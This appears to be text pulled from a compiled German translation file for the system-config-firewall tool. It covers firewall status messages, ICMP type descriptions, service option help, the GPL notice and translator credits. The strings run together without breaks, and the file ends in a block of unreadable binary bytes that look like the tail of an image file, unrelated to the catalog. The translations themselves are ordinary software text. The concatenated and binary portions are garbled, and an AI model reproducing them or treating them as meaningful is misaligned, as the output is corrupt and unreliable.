(z.B. mit freeradius), aktivieren Sie diese Option.Das Trivial File Transfer Protocol (TFTP) ist ein Protokoll, welches zum Übertragen von Dateien zu und von entfernten Systemen auf einfache Weise verwendet wird. Es wird normalerweise benutzt, um festplattenlose Arbeitsstationen zu starten oder Datenübertragungen im Preboot eXecution Environment (PXE) vorzunehmen.Die Datei »%s« existiert nicht.Die Firewall-Konfiguration ist nicht konsistent.Die Firewall ist deaktiviert.Die Firewall ist aktiviert.Die Firewall-Tabelle »%s« ist ungültig.Die folgenden Dateien fehlen oder sind nicht benutzbar:
	%s

Wenden Sie Ihre Firewall-Konfiguration nun an, um das Problem zu lösen.Protokoll-Typ »%s« ist ungültig.Es existieren noch ungespeicherte Änderungen, möchten Sie wirklich abbrechen?Diese Fehlermeldung informiert einen Host, dass er die Pakete über eine andere Route senden soll.Diese Fehlermeldung wird durch einen Host oder einen Gateway generiert, wenn das Ziel nicht erreichbar ist.Die Fehlermeldung wird erzeugt, wenn der IP-Header fehlerhaft ist, entweder durch eine fehlende Option oder eine ungültige Länge.Die Fehlermeldung wird erzeugt, wenn die Lebenszeit überschritten wurde, entweder von einem Paket oder durch die Wiederzusammenführung eines fragmentierten Paketes.Diese Fehlermeldung wird erstellt, um einen Host aufzufordern, die Sendehäufigkeit von Paketen zu reduzieren.Diese Nachricht ist die Antwort auf eine <i>Echo-Anforderung</i>.Diese Meldung wird von einem Host verwendet, der mit einer Multicast-Verbindung verknüpft ist, um sog. <i>Router Advertisement</i> anzufordern.Die Nachricht wird von Routern benutzt, welche periodisch die IP-Adresse einer Multicast-Schnittstelle veröffentlichen.Diese Nachricht wird benutzt zum Testen, ob ein Host mit dem <i>ping</i>-Dienstprogramm erreichbar istDiese Option erlaubt einem Bacula-Server, sich mit der lokalen Maschine zur Planung von Datensicherungen zu verbinden. Das bacula-client-Paket muss installiert sein, damit diese Option funktioniert.Diese Option erlaubt das Empfangen von E-Mails über SMTP. Wenn Sie anderen Rechnern erlauben möchten, E-Mails direkt an Ihren Rechner zu liefern, aktivieren Sie bitte diese Option. Falls Sie Ihre E-Mails mit POP3 oder IMAP oder einem Programm wie fetchmail bei Ihrem Dienstanbieter abholen, brauchen Sie diese Option nicht zu aktivieren. Bitte beachten Sie, dass ein fehlerhaft konfigurierter SMTP-Server von anderen Rechnern zum Spam-Versand missbraucht werden kann.Diese Option erlaubt Ihnen, auf Trivial File Transfer Protocol (TFTP)-Server zuzugreifen. Sie benötigen hierfür auch das tftp-Paket.Diese Option erlaubt Ihnen, auf Windows-Datei- und Druckerfreigaben im Netzwerk zuzugreifen. Sie benötigen hierfür auch das samba-client-Paket.Diese Option erlaubt Ihnen, auf Windows-Datei- und Druckerfreigaben im Netzwerk zuzugreifen. Sie benötigen hierfür auch das Samba-Paket.Diese Option erlaubt Ihnen, auf Red Hat Cluster Suite im Netzwerk zuzugreifen. Die Ports für openais, ricci, und dlm werden geöffnet. Sie benötigen hierfür die Red Hat Cluster Suite.Dieses Programm ist freie Software. Sie können es unter den Bedingungen der GNU General Public License, wie von der Free Software Foundation veröffentlicht, weitergeben und/oder modifizieren, entweder gemäß Version 2 der Lizenz oder (nach Ihrer Option) jeder späteren Version.

Die Veröffentlichung dieses Programms erfolgt in der Hoffnung, daß es Ihnen von Nutzen sein wird, aber OHNE IRGENDEINE GARANTIE, sogar ohne die implizite Garantie der MARKTREIFE oder der VERWENDBARKEIT FÜR EINEN BESTIMMTEN ZWECK. Details finden Sie in der GNU General Public License.

Sie sollten ein Exemplar der GNU General Public License zusammen mit diesem Programm erhalten haben. Falls nicht, werfen Sie einen Blick auf <http://www.gnu.org/licenses/>.Dieses Programm ist Ihnen beim Einrichten einer elementaren Firewall für Ihr System behilflich.Dieser Assistent ist Ihnen bei der Einrichtung einer sauberen Firewall-Konfiguration für Ihr System behilflich.Zeit überschrittenZu AdresseZu PortUm einen konsistenten Status zu erhalten, müssen die Kernel-Firewall-Module beim Neustart und Anhalten entladen werden.Vertrauenswürdige SchnittstellenVertrauenswürdige DiensteTypModule beim Neustart und Anhalten entladenFirewall nicht interaktiv aktualisieren, falls sie aktiviert ist. Dies startet die Firewall ebenfalls neu. Die Optionen -n und -f werden ignoriert.Verwenden Sie eigene Regeldateien, um zusätzliche Regeln zur Firewall hinzuzufügen. Die Regeln werden nach den Standardregeln hinzugefügt. Die Dateien müssen das Format von »iptables-save« besitzen.BenutzerdefiniertBenutzerfähigkeitenDie Verwendung dieser Optionen ohne zusätzliche Firewall-Optionen erstellt oder verändert keine Firewall-Konfiguration, lediglich SELinux wird konfiguriert.Gültige Werte: %sGültige Werte: <port>[-<port>], wobei Port entweder eine Zahl [0.65535] oder ein Service-Name sein kann.Gültige Werte: tcp, udpAusführlicher StatusVirtuelle-Maschine-ManagementVirtuelle-Maschine-Management (TLS)WWW (HTTP)WarnungWelche Art von System haben Sie?AssistentJaSie können die Einstellungen später im <i>Optionen</i>-Menü ändern.Die Firewall-Konfiguration wurde von einer alten Version konvertiert. Bitte überprüfen Sie die Konfiguration und wenden Sie an.[<type>:][<table>:]<filename>_Info_Datei_Hilfe_Optionen_BeendenKonfigurationsassistenten _startenKonfigurationif=<interface>:port=<port>:proto=<protocol>[:toport=<destination port>][:toaddr=<destination address>]Ungültige Schnittstelle »%s«.Ungültige Port-Definition %s.Ungültiger Dienst »%s«.ipv6 hat keine NAT-Unterstützung.lokalmDNS bietet die Möglichkeit DNS-Programmierschnittstellen, Paketformate und Semantiken für den Betrieb in einem kleinen Netzwerk ohne konventionellen DNS-Server zu verwenden. Falls Sie planen, Avahi zu verwenden, deaktivieren Sie diese Option nicht.modifiziertes Labelkeine derartige Option: %sOption %(option)s: Ungültiger Port für die Weiterleitung »%(value)s«Option %(option)s: Ungültiger Port für die Weiterleitung »%(value)s«: %(error)s. Option %(option)s: ungültiger ICMP-Typ »%(value)s«.Port-Bereich %s ist nicht eindeutig.system-config-firewallBernd Groh <bgroh@redhat.com>, 2002,2003,2004.
Andreas Müller <redhat@andreas-mueller.com>, 2003.
Bernd Bartmann <Bernd.Bartmann@sohanet.de>, 2004.
Verena <vfuehrer@redhat.com>, 2004.
Ronny Buchmann <ronny-vlug@vlugnet.org>, 2005,2006.
Nadine Reissle <nreissle@redhat.com>, 2006.
Marcus Gloeckner <mgloeckner@gmail.com>, 2006.
Timo Trinks <ttrinks@redhat.com>, 2007.
Michael Schönitzer <michael@schoenitzer.de>, 2007.
Thomas Woerner <twoerner@redhat.com>, 2008.
Florian Festi <ffesti@redhat.com>, 2008.
Fabian Affolter <fab@fedoraproject.org>, 2008, 2009.
Dominik Sandjaja <dominiksandjaja@fedoraproject.org>, 2008.
Daniela Kugelmann <dkugelma@redhat.com>, 2008.
Mario Blättermann <mariobl@freenet.de>, 2011.Firewall-KonfigurationMarkieren Sie die ICMP-Typen in der Liste, die abgelehnt werden sollen. Alle anderen ICMP-Typen dürfen die Firewall passieren. Der Standardwert ist keine Einschränkung.Das Internet Control Message Protocol (ICMP) wird hauptsächlich verwendet, um Fehlermeldungen zwischen vernetzten Computern zu versenden, sondern zusätzlich für informative Meldungen wie Ping-Anfragen und Antworten.Verwenden Sie benutzerdefinierte Regeln für das Hinzufügen von zusätzlichen Regeln zur Firewall. Die benutzerdefinierten Regeln werden nach den Standardregeln hinzugefügt. Die Dateien müssen das iptables-save-Format haben.
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`